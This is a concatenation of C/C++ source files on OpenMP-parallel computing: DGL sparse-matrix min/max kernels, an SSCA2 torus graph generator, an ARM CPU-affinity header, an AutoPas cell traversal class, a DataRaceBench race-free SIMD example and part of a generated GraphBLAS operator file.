DType* O = static_cast<DType*>(out->data);
IdType* argX = Op::use_lhs? static_cast<IdType*>(argu->data) : nullptr;
IdType* argW = Op::use_rhs? static_cast<IdType*>(arge->data) : nullptr;
#pragma omp parallel for
for (IdType rid = 0; rid < csr.num_rows; ++rid) {
const IdType row_start = indptr[rid], row_end = indptr[rid + 1];
DType* out_off = O + rid * dim;
IdType* argx_off = argX + rid * dim;
IdType* argw_off = argW + rid * dim;
for (int64_t k = 0; k < dim; ++k) {
DType accum = Cmp::zero;
IdType ax = 0, aw = 0;
for (IdType j = row_start; j < row_end; ++j) {
const IdType cid = indices[j];
const IdType eid = has_idx? edges[j] : j;
const int64_t lhs_add = bcast.use_bcast ? bcast.lhs_offset[k] : k;
const int64_t rhs_add = bcast.use_bcast ? bcast.rhs_offset[k] : k;
const DType* lhs_off = Op::use_lhs? X + cid * lhs_dim + lhs_add : nullptr;
const DType* rhs_off = Op::use_rhs? W + eid * rhs_dim + rhs_add : nullptr;
const DType val = Op::Call(lhs_off, rhs_off);
if (Cmp::Call(accum, val)) {
accum = val;
if (Op::use_lhs)
ax = cid;
if (Op::use_rhs)
aw = eid;
}
}
out_off[k] = accum;
if (Op::use_lhs)
argx_off[k] = ax;
if (Op::use_rhs)
argw_off[k] = aw;
}
}
}
/*!
* \brief CPU kernel of SpMM-Min/Max on Coo format.
* \param bcast Broadcast information.
* \param coo The Coo matrix.
* \param ufeat The feature on source nodes.
* \param efeat The feature on edges.
* \param out The result feature on destination nodes.
* \param argu Arg-Min/Max on source nodes, which refers to the source node
* indices corresponding to the minimum/maximum values of the reduction
* result on destination nodes. It's useful in computing gradients of the
* Min/Max reducer.
* \param arge Arg-Min/Max on edges, which refers to the edge indices
* corresponding to the minimum/maximum values of the reduction result on
* destination nodes. It's useful in computing gradients of the Min/Max
* reducer.
* \note It uses an edge-parallel strategy: different threads are responsible
* for the computation of different edges. To avoid possible data hazards,
* the reduction phase is serialized with an OpenMP critical section.
*/
template <typename IdType, typename DType, typename Op, typename Cmp>
void SpMMCmpCoo(
const BcastOff& bcast,
const COOMatrix& coo,
NDArray ufeat, NDArray efeat,
NDArray out, NDArray argu, NDArray arge) {
const bool has_idx = !IsNullArray(coo.data);
const IdType* row = static_cast<IdType*>(coo.row->data);
const IdType* col = static_cast<IdType*>(coo.col->data);
const IdType* edges = has_idx? static_cast<IdType*>(coo.data->data) : nullptr;
const DType* X = Op::use_lhs? static_cast<DType*>(ufeat->data) : nullptr;
const DType* W = Op::use_rhs? static_cast<DType*>(efeat->data) : nullptr;
const int64_t dim = bcast.out_len,
lhs_dim = bcast.lhs_len,
rhs_dim = bcast.rhs_len;
DType* O = static_cast<DType*>(out->data);
IdType* argX = Op::use_lhs? static_cast<IdType*>(argu->data) : nullptr;
IdType* argW = Op::use_rhs? static_cast<IdType*>(arge->data) : nullptr;
const int64_t nnz = coo.row->shape[0];
// fill zero elements
std::fill(O, O + out.NumElements(), Cmp::zero);
// spmm
#pragma omp parallel for
for (IdType i = 0; i < nnz; ++i) {
const IdType rid = row[i];
const IdType cid = col[i];
const IdType eid = has_idx? edges[i] : i;
DType* out_off = O + cid * dim;
IdType* argx_off = Op::use_lhs? argX + cid * dim : nullptr;
IdType* argw_off = Op::use_rhs? argW + cid * dim : nullptr;
for (int64_t k = 0; k < dim; ++k) {
const int64_t lhs_add = bcast.use_bcast ? bcast.lhs_offset[k] : k;
const int64_t rhs_add = bcast.use_bcast ? bcast.rhs_offset[k] : k;
const DType* lhs_off = Op::use_lhs? X + rid * lhs_dim + lhs_add : nullptr;
const DType* rhs_off = Op::use_rhs? W + eid * rhs_dim + rhs_add : nullptr;
const DType val = Op::Call(lhs_off, rhs_off);
#pragma omp critical
if (Cmp::Call(out_off[k], val)) {
out_off[k] = val;
if (Op::use_lhs)
argx_off[k] = rid;
if (Op::use_rhs)
argw_off[k] = eid;
}
}
}
}
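// A minimal sketch (not part of DGL) of how a caller might choose between the
// two kernels above: the CSR variant parallelizes over destination rows and
// needs no synchronization, while the COO variant parallelizes over edges and
// serializes every update through a critical section, so CSR is usually the
// better choice for Min/Max reductions when both formats are available.
// `graph.HasCsr()` is a hypothetical predicate used only for illustration:
//
//   if (graph.HasCsr())
//     SpMMCmpCsr<IdType, DType, Op, Cmp>(bcast, csr, ufeat, efeat, out, argu, arge);
//   else
//     SpMMCmpCoo<IdType, DType, Op, Cmp>(bcast, coo, ufeat, efeat, out, argu, arge);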
namespace op {
//////////////////////////////// binary operators on CPU ////////////////////////////////
template <typename DType>
struct Add {
static constexpr bool use_lhs = true;
static constexpr bool use_rhs = true;
inline static DType Call(const DType* lhs_off, const DType* rhs_off) {
return *lhs_off + *rhs_off;
}
};
template <typename DType> constexpr bool Add<DType>::use_lhs;
template <typename DType> constexpr bool Add<DType>::use_rhs;
template <typename DType>
struct Sub {
static constexpr bool use_lhs = true;
static constexpr bool use_rhs = true;
inline static DType Call(const DType* lhs_off, const DType* rhs_off) {
return *lhs_off - *rhs_off;
}
};
template <typename DType> constexpr bool Sub<DType>::use_lhs;
template <typename DType> constexpr bool Sub<DType>::use_rhs;
template <typename DType>
struct Mul {
static constexpr bool use_lhs = true;
static constexpr bool use_rhs = true;
inline static DType Call(const DType* lhs_off, const DType* rhs_off) {
return *lhs_off * *rhs_off;
}
};
template <typename DType> constexpr bool Mul<DType>::use_lhs;
template <typename DType> constexpr bool Mul<DType>::use_rhs;
template <typename DType>
struct Div {
static constexpr bool use_lhs = true;
static constexpr bool use_rhs = true;
inline static DType Call(const DType* lhs_off, const DType* rhs_off) {
return *lhs_off / *rhs_off;
}
};
template <typename DType> constexpr bool Div<DType>::use_lhs;
template <typename DType> constexpr bool Div<DType>::use_rhs;
template <typename DType>
struct CopyLhs {
static constexpr bool use_lhs = true;
static constexpr bool use_rhs = false;
inline static DType Call(const DType* lhs_off, const DType* ) {
return *lhs_off;
}
};
template <typename DType> constexpr bool CopyLhs<DType>::use_lhs;
template <typename DType> constexpr bool CopyLhs<DType>::use_rhs;
template <typename DType>
struct CopyRhs {
static constexpr bool use_lhs = false;
static constexpr bool use_rhs = true;
inline static DType Call(const DType* , const DType* rhs_off) {
return *rhs_off;
}
};
template <typename DType> constexpr bool CopyRhs<DType>::use_lhs;
template <typename DType> constexpr bool CopyRhs<DType>::use_rhs;
//////////////////////////////// Reduce operators on CPU ////////////////////////////////
template <typename DType>
struct Max {
static constexpr DType zero = std::numeric_limits<DType>::lowest();
// return true if accum should be replaced
  inline static bool Call(DType accum, DType val) {
return accum < val;
}
};
template <typename DType> constexpr DType Max<DType>::zero;
template <typename DType>
struct Min {
static constexpr DType zero = std::numeric_limits<DType>::max();
// return true if accum should be replaced
  inline static bool Call(DType accum, DType val) {
return accum > val;
}
};
template <typename DType> constexpr DType Min<DType>::zero;
#define SWITCH_OP(op, Op, ...) \
do { \
if ((op) == "add") { \
typedef dgl::aten::cpu::op::Add<DType> Op; \
{ __VA_ARGS__ } \
} else if ((op) == "sub") { \
typedef dgl::aten::cpu::op::Sub<DType> Op; \
{ __VA_ARGS__ } \
} else if ((op) == "mul") { \
typedef dgl::aten::cpu::op::Mul<DType> Op; \
{ __VA_ARGS__ } \
} else if ((op) == "div") { \
typedef dgl::aten::cpu::op::Div<DType> Op; \
{ __VA_ARGS__ } \
} else if ((op) == "copy_u") { \
typedef dgl::aten::cpu::op::CopyLhs<DType> Op; \
{ __VA_ARGS__ } \
} else if ((op) == "copy_e") { \
typedef dgl::aten::cpu::op::CopyRhs<DType> Op; \
{ __VA_ARGS__ } \
} else { \
LOG(FATAL) << "Unsupported SpMM binary operator: " << op; \
} \
} while (0)
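// Illustrative (hypothetical) usage of SWITCH_OP: it assumes a DType typedef
// is in scope, binds the matching operator functor to `Op`, and expands the
// body once; an unrecognized name falls through to LOG(FATAL). For example:
//
//   SWITCH_OP(op, Op, {
//     SpMMCmpCsr<IdType, DType, Op, op::Max<DType>>(
//         bcast, csr, ufeat, efeat, out, argu, arge);
//   });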
} // namespace op
} // namespace cpu
} // namespace aten
} // namespace dgl
#endif // DGL_ARRAY_CPU_SPMM_H_
|
gen2DTorus.c | #include "defs.h"
#define PARALLEL_SDG
/* Comment out the PARALLEL_SDG definition above to run the data generator
   on one thread (for debugging purposes) */
double gen2DTorus(graphSDG* SDGdata) {
VERT_T *src, *dest;
WEIGHT_T *wt;
#ifdef _OPENMP
omp_lock_t* vLock;
#endif
double elapsed_time;
int seed;
elapsed_time = get_seconds();
/* allocate memory for edge tuples */
src = (VERT_T *) malloc(M*sizeof(VERT_T));
dest = (VERT_T *) malloc(M*sizeof(VERT_T));
wt = (WEIGHT_T *) malloc(M*sizeof(WEIGHT_T));
assert(src != NULL);
assert(dest != NULL);
assert(wt != NULL);
/* sprng seed */
seed = 2387;
#ifdef _OPENMP
#ifdef PARALLEL_SDG
omp_set_num_threads(omp_get_max_threads());
// omp_set_num_threads(16);
#else
omp_set_num_threads(1);
#endif
#endif
#ifdef _OPENMP
#pragma omp parallel
{
#endif
int tid, nthreads;
#ifdef DIAGNOSTIC
double elapsed_time_part;
#endif
int *stream;
LONG_T n, m;
LONG_T i, j, x, y;
LONG_T x_start, x_end, offset;
LONG_T count;
#ifdef _OPENMP
nthreads = omp_get_num_threads();
tid = omp_get_thread_num();
#else
nthreads = 1;
tid = 0;
#endif
/* Initialize RNG stream */
stream = init_sprng(0, tid, nthreads, seed, SPRNG_DEFAULT);
#ifdef DIAGNOSTIC
if (tid == 0)
elapsed_time_part = get_seconds();
#endif
n = N;
m = M;
if (SCALE % 2 == 0) {
x = 1<<(SCALE/2);
y = 1<<(SCALE/2);
} else {
x = 1<<((SCALE+1)/2);
y = 1<<((SCALE-1)/2);
}
count = 0;
x_start = (x/nthreads)*tid;
x_end = (x/nthreads)*(tid+1);
if (tid == 0)
x_start = 0;
if (tid == nthreads-1)
x_end = x;
offset = 4*x_start*y;
fprintf(stderr, "tid: %d, x_start: %d, x_end: %d, offset: %d\n",
tid, x_start, x_end, offset);
// if (tid == 0) {
for (i = x_start; i < x_end; i++) {
for (j = 0; j < y; j++) {
/* go down */
if (j > 0) {
src[offset+count] = y*i + j;
dest[offset+count] = y*i + j - 1;
} else {
src[offset+count] = y*i + j;
dest[offset+count] = y*i + y - 1;
}
count++;
/* go up */
if (j < y-1) {
src[offset+count] = y*i + j;
dest[offset+count] = y*i + j + 1;
} else {
src[offset+count] = y*i + j;
dest[offset+count] = y*i;
}
count++;
/* go left */
if (i > 0) {
src[offset+count] = y*i + j;
dest[offset+count] = y*(i-1) + j;
} else {
src[offset+count] = y*i + j;
dest[offset+count] = y*(x-1) + j;
}
count++;
/* go right */
if (i < x-1) {
src[offset+count] = y*i + j;
dest[offset+count] = y*(i+1) + j;
} else {
src[offset+count] = y*i + j;
dest[offset+count] = j;
}
count++;
}
}
// }
#ifdef _OPENMP
#pragma omp barrier
#endif
#ifdef DIAGNOSTIC
if (tid == 0) {
elapsed_time_part = get_seconds() -elapsed_time_part;
fprintf(stderr, "Tuple generation time: %lf seconds\n", elapsed_time_part);
elapsed_time_part = get_seconds();
}
#endif
#ifdef _OPENMP
#pragma omp barrier
#pragma omp for
#endif
for (i=0; i<m; i++) {
wt[i] = 1 + MaxIntWeight * sprng(stream);
}
#ifdef DIAGNOSTIC
if (tid == 0) {
elapsed_time_part = get_seconds() - elapsed_time_part;
fprintf(stderr, "Generating edge weights: %lf seconds\n", elapsed_time_part);
elapsed_time_part = get_seconds();
}
#endif
SDGdata->n = n;
SDGdata->m = m;
SDGdata->startVertex = src;
SDGdata->endVertex = dest;
SDGdata->weight = wt;
#ifdef _OPENMP
}
#endif
elapsed_time = get_seconds() - elapsed_time;
return elapsed_time;
}
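/* Note (added for clarity, assuming the usual SSCA2 defs.h conventions):
   every vertex of the x*y torus emits exactly four directed edges (down, up,
   left, right), so the tuple arrays are sized for M = 4*N entries; the
   per-thread base index offset = 4*x_start*y relies on the same invariant. */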
|
arm_device.h | #ifndef ANAKIN2_SABER_ARM_DEVICES_H
#define ANAKIN2_SABER_ARM_DEVICES_H
#include <stdio.h>
#include <vector>
#include "device.h"
#ifdef PLATFORM_ANDROID
#include <sys/syscall.h>
#include <unistd.h>
#define __NCPUBITS__ (8 * sizeof (unsigned long))
#define __CPU_SET(cpu, cpusetp) \
((cpusetp)->mask_bits[(cpu) / __NCPUBITS__] |= (1UL << ((cpu) % __NCPUBITS__)))
#define __CPU_ZERO(cpusetp) \
memset((cpusetp), 0, sizeof(cpu_set_t))
#endif
#if __APPLE__
#include "TargetConditionals.h"
#if TARGET_OS_IPHONE
#include <sys/types.h>
#include <sys/sysctl.h>
#include <mach/machine.h>
#define __IOS__
#endif
#endif
#ifdef USE_ARM_PLACE
static int arm_get_cpucount()
{
#ifdef PLATFORM_ANDROID
// get cpu count from /proc/cpuinfo
FILE* fp = fopen("/proc/cpuinfo", "rb");
if (!fp) {
return 1;
}
int count = 0;
char line[1024];
while (!feof(fp))
{
char* s = fgets(line, 1024, fp);
if (!s) {
break;
}
if (memcmp(line, "processor", 9) == 0) {
count++;
}
}
fclose(fp);
if (count < 1) {
count = 1;
}
return count;
#elif defined(__IOS__)
int count = 0;
size_t len = sizeof(count);
sysctlbyname("hw.ncpu", &count, &len, NULL, 0);
if (count < 1) {
count = 1;
}
return count;
#else
return 1;
#endif
}
static int arm_get_meminfo()
{
#ifdef PLATFORM_ANDROID
    // get total memory from /proc/meminfo
FILE* fp = fopen("/proc/meminfo", "rb");
if (!fp) {
return 1;
}
int memsize = 0;
char line[1024];
while (!feof(fp))
{
char* s = fgets(line, 1024, fp);
if (!s) {
break;
}
sscanf(s, "MemTotal: %d kB", &memsize);
}
fclose(fp);
return memsize;
#elif defined(__IOS__)
    // to be implemented
    return 0;
#else
    return 0;
#endif
}
#ifdef PLATFORM_ANDROID
static int get_max_freq_khz(int cpuid)
{
// first try, for all possible cpu
char path[256];
snprintf(path, sizeof(path), "/sys/devices/system/cpu/cpufreq/stats/cpu%d/time_in_state",\
cpuid);
FILE* fp = fopen(path, "rb");
if (!fp)
{
// second try, for online cpu
snprintf(path, sizeof(path), "/sys/devices/system/cpu/cpu%d/cpufreq/stats/time_in_state",\
cpuid);
fp = fopen(path, "rb");
if (!fp)
{
// third try, for online cpu
snprintf(path, sizeof(path), "/sys/devices/system/cpu/cpu%d/cpufreq/cpuinfo_max_freq",\
cpuid);
fp = fopen(path, "rb");
if (!fp) {
return -1;
}
int max_freq_khz = -1;
fscanf(fp, "%d", &max_freq_khz);
fclose(fp);
return max_freq_khz;
}
}
int max_freq_khz = 0;
while (!feof(fp))
{
int freq_khz = 0;
int nscan = fscanf(fp, "%d %*d", &freq_khz);
if (nscan != 1) {
break;
}
if (freq_khz > max_freq_khz) {
max_freq_khz = freq_khz;
}
}
fclose(fp);
return max_freq_khz;
}
static int arm_sort_cpuid_by_max_frequency(int cpu_count, std::vector<int>& cpuids, \
std::vector<int>& cpu_freq, std::vector<int>& cluster_ids) {
//const int cpu_count = cpuids.size();
if (cpu_count == 0) {
return 0;
}
//std::vector<int> cpu_max_freq_khz;
cpuids.resize(cpu_count);
cpu_freq.resize(cpu_count);
cluster_ids.resize(cpu_count);
for (int i = 0; i < cpu_count; i++)
{
int max_freq_khz = get_max_freq_khz(i);
//printf("%d max freq = %d khz\n", i, max_freq_khz);
cpuids[i] = i;
cpu_freq[i] = max_freq_khz / 1000;
}
// sort cpuid as big core first
// simple bubble sort
/*
for (int i = 0; i < cpu_count; i++)
{
for (int j = i+1; j < cpu_count; j++)
{
if (cpu_freq[i] < cpu_freq[j])
{
// swap
int tmp = cpuids[i];
cpuids[i] = cpuids[j];
cpuids[j] = tmp;
tmp = cpu_freq[i];
cpu_freq[i] = cpu_freq[j];
cpu_freq[j] = tmp;
}
}
}*/
// SMP
int mid_max_freq_khz = (cpu_freq.front() + cpu_freq.back()) / 2;
//if (mid_max_freq_khz == cpu_freq.back())
// return 0;
for (int i = 0; i < cpu_count; i++)
{
if (cpu_freq[i] >= mid_max_freq_khz) {
cluster_ids[i] = 0;
}
else{
cluster_ids[i] = 1;
}
}
return 0;
}
#endif // PLATFORM_ANDROID
#ifdef __IOS__
static int sort_cpuid_by_max_frequency(int cpu_count, std::vector<int>& cpuids, \
std::vector<int>& cpu_freq, std::vector<int>& cluster_ids){
if (cpu_count == 0) {
return 0;
}
cpuids.resize(cpu_count);
cpu_freq.resize(cpu_count);
cluster_ids.resize(cpu_count);
for (int i = 0; i < cpu_count; ++i) {
cpuids[i] = i;
cpu_freq[i] = 1000;
cluster_ids[i] = 0;
}
    return 0;
}
#endif
#ifdef PLATFORM_ANDROID
static int set_sched_affinity(const std::vector<int>& cpuids)
{
// cpu_set_t definition
// ref http://stackoverflow.com/questions/16319725/android-set-thread-affinity
typedef struct
{
unsigned long mask_bits[1024 / __NCPUBITS__];
}cpu_set_t;
// set affinity for thread
pid_t pid = gettid();
cpu_set_t mask;
__CPU_ZERO(&mask);
for (int i = 0; i < (int)cpuids.size(); i++)
{
__CPU_SET(cpuids[i], &mask);
}
int syscallret = syscall(__NR_sched_setaffinity, pid, sizeof(mask), &mask);
if (syscallret)
{
LOG(ERROR) << "syscall error " << syscallret;
return -1;
}
return 0;
}
static int set_cpu_affinity(const std::vector<int>& cpuids){
#ifdef USE_OPENMP
int num_threads = cpuids.size();
omp_set_num_threads(num_threads);
std::vector<int> ssarets(num_threads, 0);
#pragma omp parallel for
for (int i = 0; i < num_threads; i++)
{
ssarets[i] = set_sched_affinity(cpuids);
}
for (int i = 0; i < num_threads; i++)
{
if (ssarets[i] != 0)
{
LOG(ERROR)<<"set cpu affinity failed, cpuID: " << cpuids[i];
return -1;
}
}
#else
std::vector<int> cpuid1;
cpuid1.push_back(cpuids[0]);
int ssaret = set_sched_affinity(cpuid1);
if (ssaret != 0)
{
LOG(ERROR)<<"set cpu affinity failed, cpuID: " << cpuids[0];
return -1;
}
#endif
return 0;
}
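// Illustrative (hypothetical) usage of the helpers above: bind the OpenMP
// workers to the high-frequency cluster (cluster id 0). The local variable
// names are assumptions for this sketch, not part of the header:
//
//   int count = arm_get_cpucount();
//   std::vector<int> cpuids, cpu_freq, cluster_ids;
//   arm_sort_cpuid_by_max_frequency(count, cpuids, cpu_freq, cluster_ids);
//   std::vector<int> big_cores;
//   for (int i = 0; i < count; ++i)
//       if (cluster_ids[i] == 0) big_cores.push_back(cpuids[i]);
//   if (!big_cores.empty()) set_cpu_affinity(big_cores);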
#endif //PLATFORM_ANDROID
#endif //USE_ARM_PLACE
#endif //ANAKIN2_SABER_ARM_DEVICES_H
|
CBasedTraversal.h | /**
* @file CBasedTraversal.h
* @author C. Menges
* @date 26.04.2019
*/
#pragma once
#include "autopas/containers/cellPairTraversals/CellPairTraversal.h"
#include "autopas/utils/ArrayMath.h"
#include "autopas/utils/DataLayoutConverter.h"
#include "autopas/utils/ThreeDimensionalMapping.h"
namespace autopas {
/**
* This class provides the base for traversals using base steps based on cell coloring.
*
* @tparam ParticleCell the type of cells
* @tparam PairwiseFunctor The functor that defines the interaction of two particles.
* @tparam dataLayout
* @tparam useNewton3
 * @tparam collapseDepth Set the depth of loop collapsing for OpenMP. Loop variables from outer to inner loop: z,y,x
*/
template <class ParticleCell, class PairwiseFunctor, DataLayoutOption::Value dataLayout, bool useNewton3,
int collapseDepth = 3>
class CBasedTraversal : public CellPairTraversal<ParticleCell> {
protected:
/**
* Constructor of the CBasedTraversal.
* @param dims The dimensions of the cellblock, i.e. the number of cells in x,
* y and z direction.
* @param pairwiseFunctor The functor that defines the interaction of two particles.
* @param interactionLength Interaction length (cutoff + skin).
* @param cellLength cell length.
*/
explicit CBasedTraversal(const std::array<unsigned long, 3> &dims, PairwiseFunctor *pairwiseFunctor,
const double interactionLength, const std::array<double, 3> &cellLength)
: CellPairTraversal<ParticleCell>(dims),
_interactionLength(interactionLength),
_cellLength(cellLength),
_dataLayoutConverter(pairwiseFunctor) {
for (unsigned int d = 0; d < 3; d++) {
_overlap[d] = std::ceil(_interactionLength / _cellLength[d]);
}
}
/**
* Destructor of CBasedTraversal.
*/
~CBasedTraversal() override = default;
public:
/**
* load Data Layouts required for this Traversal if cells have been set through setCellsToTraverse().
*/
void initTraversal() override {
if (this->_cells) {
auto &cells = *(this->_cells);
#ifdef AUTOPAS_OPENMP
/// @todo find a condition on when to use omp or when it is just overhead
#pragma omp parallel for
#endif
for (size_t i = 0; i < cells.size(); ++i) {
_dataLayoutConverter.loadDataLayout(cells[i]);
}
}
}
/**
* write Data to AoS if cells have been set through setCellsToTraverse().
*/
void endTraversal() override {
if (this->_cells) {
auto &cells = *(this->_cells);
#ifdef AUTOPAS_OPENMP
/// @todo find a condition on when to use omp or when it is just overhead
#pragma omp parallel for
#endif
for (size_t i = 0; i < cells.size(); ++i) {
_dataLayoutConverter.storeDataLayout(cells[i]);
}
}
}
protected:
/**
* The main traversal of the CTraversal.
* @tparam LoopBody type of the loop body
   * @param loopBody The body of the loop as a function. Normally a lambda function that takes as parameters
* (x,y,z). If you need additional input from outside, please use captures (by reference).
* @param end 3D index until interactions are processed (exclusive).
* @param stride Distance (in cells) to the next cell of the same color.
* @param offset initial offset (in cells) in which cell to start the traversal.
*/
template <typename LoopBody>
inline void cTraversal(LoopBody &&loopBody, const std::array<unsigned long, 3> &end,
const std::array<unsigned long, 3> &stride,
const std::array<unsigned long, 3> &offset = {0ul, 0ul, 0ul});
/**
* This method is called when the color during the traversal has changed.
*
* @param newColor The new current color.
*/
  virtual void notifyColorChange(unsigned long newColor) {}
/**
* Interaction length (cutoff + skin).
*/
const double _interactionLength;
/**
* cell length in CellBlock3D.
*/
const std::array<double, 3> _cellLength;
/**
* overlap of interacting cells. Array allows asymmetric cell sizes.
*/
std::array<unsigned long, 3> _overlap;
private:
/**
* Data Layout Converter to be used with this traversal
*/
utils::DataLayoutConverter<PairwiseFunctor, dataLayout> _dataLayoutConverter;
};
template <class ParticleCell, class PairwiseFunctor, DataLayoutOption::Value dataLayout, bool useNewton3,
int collapseDepth>
template <typename LoopBody>
inline void CBasedTraversal<ParticleCell, PairwiseFunctor, dataLayout, useNewton3, collapseDepth>::cTraversal(
LoopBody &&loopBody, const std::array<unsigned long, 3> &end, const std::array<unsigned long, 3> &stride,
const std::array<unsigned long, 3> &offset) {
#if defined(AUTOPAS_OPENMP)
#pragma omp parallel
#endif
{
const unsigned long numColors = stride[0] * stride[1] * stride[2];
for (unsigned long col = 0; col < numColors; ++col) {
#if defined(AUTOPAS_OPENMP)
#pragma omp single
#endif
{
// barrier at omp for of previous loop iteration, so fine to change it for everyone!
notifyColorChange(col);
// implicit barrier at end of function.
}
std::array<unsigned long, 3> startWithoutOffset(utils::ThreeDimensionalMapping::oneToThreeD(col, stride));
std::array<unsigned long, 3> start(utils::ArrayMath::add(startWithoutOffset, offset));
// intel compiler demands following:
const unsigned long start_x = start[0], start_y = start[1], start_z = start[2];
const unsigned long end_x = end[0], end_y = end[1], end_z = end[2];
const unsigned long stride_x = stride[0], stride_y = stride[1], stride_z = stride[2];
if (collapseDepth == 2) {
#if defined(AUTOPAS_OPENMP)
#pragma omp for schedule(dynamic, 1) collapse(2)
#endif
for (unsigned long z = start_z; z < end_z; z += stride_z) {
for (unsigned long y = start_y; y < end_y; y += stride_y) {
for (unsigned long x = start_x; x < end_x; x += stride_x) {
// Don't exchange order of execution (x must be last!), it would break other code
loopBody(x, y, z);
}
}
}
} else {
#if defined(AUTOPAS_OPENMP)
#pragma omp for schedule(dynamic, 1) collapse(3)
#endif
for (unsigned long z = start_z; z < end_z; z += stride_z) {
for (unsigned long y = start_y; y < end_y; y += stride_y) {
for (unsigned long x = start_x; x < end_x; x += stride_x) {
// Don't exchange order of execution (x must be last!), it would break other code
loopBody(x, y, z);
}
}
}
}
}
}
}
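// A minimal sketch (assumption, not AutoPas code) of how a derived traversal
// might drive cTraversal(): `stride` encodes the coloring (e.g. a c08-style
// scheme uses 2 cells per dimension), and the lambda receives the 3D index of
// the base cell of the current step. `processBaseCell` is hypothetical:
//
//   const std::array<unsigned long, 3> stride = {2ul, 2ul, 2ul};
//   this->cTraversal(
//       [&](unsigned long x, unsigned long y, unsigned long z) {
//         processBaseCell(x, y, z);
//       },
//       this->_cellsPerDimension, stride);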
} // namespace autopas
|
2018-simd2-orig-no.c | /*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
two dimensional array computation with a vectorization directive
*/
int a[100][100], b[100][100], c[100][100];
int main()
{
int i,j;
#pragma omp simd collapse(2)
for (i=0;i<100;i++)
for (j=0;j<100;j++)
a[i][j]=b[i][j]*c[i][j];
return 0;
}
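/* Note (added for clarity): iteration (i,j) writes only a[i][j] and reads only
   b[i][j] and c[i][j], so the collapsed iteration space is fully independent
   and the simd directive introduces no data race. */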
|
GB_binop__bclr_uint32.c | //------------------------------------------------------------------------------
// GB_binop: hard-coded functions for each built-in binary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2021, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated2/ folder, do not edit it
// (it is auto-generated from Generator/*).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_emult.h"
#include "GB_control.h"
#include "GB_ek_slice.h"
#include "GB_dense.h"
#include "GB_atomics.h"
#include "GB_bitmap_assign_methods.h"
#include "GB_binop__include.h"
// C=binop(A,B) is defined by the following types and operators:
// A+B function (eWiseAdd): GB (_AaddB__bclr_uint32)
// A.*B function (eWiseMult): GB (_AemultB_01__bclr_uint32)
// A.*B function (eWiseMult): GB (_AemultB_02__bclr_uint32)
// A.*B function (eWiseMult): GB (_AemultB_03__bclr_uint32)
// A.*B function (eWiseMult): GB (_AemultB_bitmap__bclr_uint32)
// A*D function (colscale): GB ((none))
// D*A function (rowscale): GB ((none))
// C+=B function (dense accum): GB (_Cdense_accumB__bclr_uint32)
// C+=b function (dense accum): GB (_Cdense_accumb__bclr_uint32)
// C+=A+B function (dense ewise3): GB ((none))
// C=A+B function (dense ewise3): GB (_Cdense_ewise3_noaccum__bclr_uint32)
// C=scalar+B GB (_bind1st__bclr_uint32)
// C=scalar+B' GB (_bind1st_tran__bclr_uint32)
// C=A+scalar GB (_bind2nd__bclr_uint32)
// C=A'+scalar GB (_bind2nd_tran__bclr_uint32)
// C type: uint32_t
// A type: uint32_t
// B,b type: uint32_t
// BinaryOp: cij = GB_BITCLR (aij, bij, uint32_t, 32)
#define GB_ATYPE \
uint32_t
#define GB_BTYPE \
uint32_t
#define GB_CTYPE \
uint32_t
// true if the types of A and B are identical
#define GB_ATYPE_IS_BTYPE \
1
// true if the types of C and A are identical
#define GB_CTYPE_IS_ATYPE \
1
// true if the types of C and B are identical
#define GB_CTYPE_IS_BTYPE \
1
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA,A_iso) \
uint32_t aij = GBX (Ax, pA, A_iso)
// bij = Bx [pB]
#define GB_GETB(bij,Bx,pB,B_iso) \
uint32_t bij = GBX (Bx, pB, B_iso)
// declare scalar of the same type as C
#define GB_CTYPE_SCALAR(t) \
uint32_t t
// cij = Ax [pA]
#define GB_COPY_A_TO_C(cij,Ax,pA,A_iso) \
cij = GBX (Ax, pA, A_iso)
// cij = Bx [pB]
#define GB_COPY_B_TO_C(cij,Bx,pB,B_iso) \
cij = GBX (Bx, pB, B_iso)
#define GB_CX(p) Cx [p]
// binary operator
#define GB_BINOP(z,x,y,i,j) \
z = GB_BITCLR (x, y, uint32_t, 32) ;
// true if the binop must be flipped
#define GB_BINOP_FLIP \
1
// op is second
#define GB_OP_IS_SECOND \
0
// do the numerical phases of GB_add and GB_emult
#define GB_PHASE_2_OF_2
// hard-coded loops can be vectorized
